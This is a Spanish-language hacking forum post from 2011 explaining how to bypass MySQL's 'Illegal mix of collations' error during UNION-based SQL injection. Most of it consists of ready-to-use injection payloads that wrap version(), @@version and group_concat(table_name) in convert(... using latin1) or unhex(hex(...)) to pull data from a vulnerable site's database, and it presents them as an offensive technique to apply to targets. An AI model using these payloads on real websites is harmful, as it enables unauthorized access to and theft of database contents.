send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bypassear "Illegal mix of collations"

  • 0 Respuestas
  • 1203 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« en: Agosto 25, 2011, 12:16:05 am »
Bueno supongamos que tenemos una inyeccion comun y ya sacamos las columnas vulnerables, ahi es cuando tratamos de encontrar la version y hacemos


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,version(),4,5,6,7--

o sino

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,@@version,4,5,6,7--

Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR

Hay varias maneras de bypassear esto, algunas son:

Convert("comando" using latin1)

unhex(hex("comando"))

Ejemplos:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--

LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--

Espero que les haya gustado!

 

¿Te gustó el post? COMPARTILO!



Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 2913
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster
Bypassear uploader con validacion en JavaScript

Iniciado por Xt3mP

Respuestas: 2
Vistas: 2261
Último mensaje Agosto 30, 2012, 01:31:40 pm
por hdbreaker
Bypassear FuckingScan[Mozilla Firefox]

Iniciado por Matabarras

Respuestas: 1
Vistas: 1472
Último mensaje Abril 16, 2014, 07:07:42 am
por meteor0
Otra forma de bypassear un uploader

Iniciado por Xt3mP

Respuestas: 0
Vistas: 2374
Último mensaje Abril 20, 2012, 02:42:01 am
por Xt3mP
Url`s amigables "su uso y explicacion"

Iniciado por Dr0B4ck

Respuestas: 1
Vistas: 1637
Último mensaje Abril 04, 2012, 05:48:13 pm
por th3nolo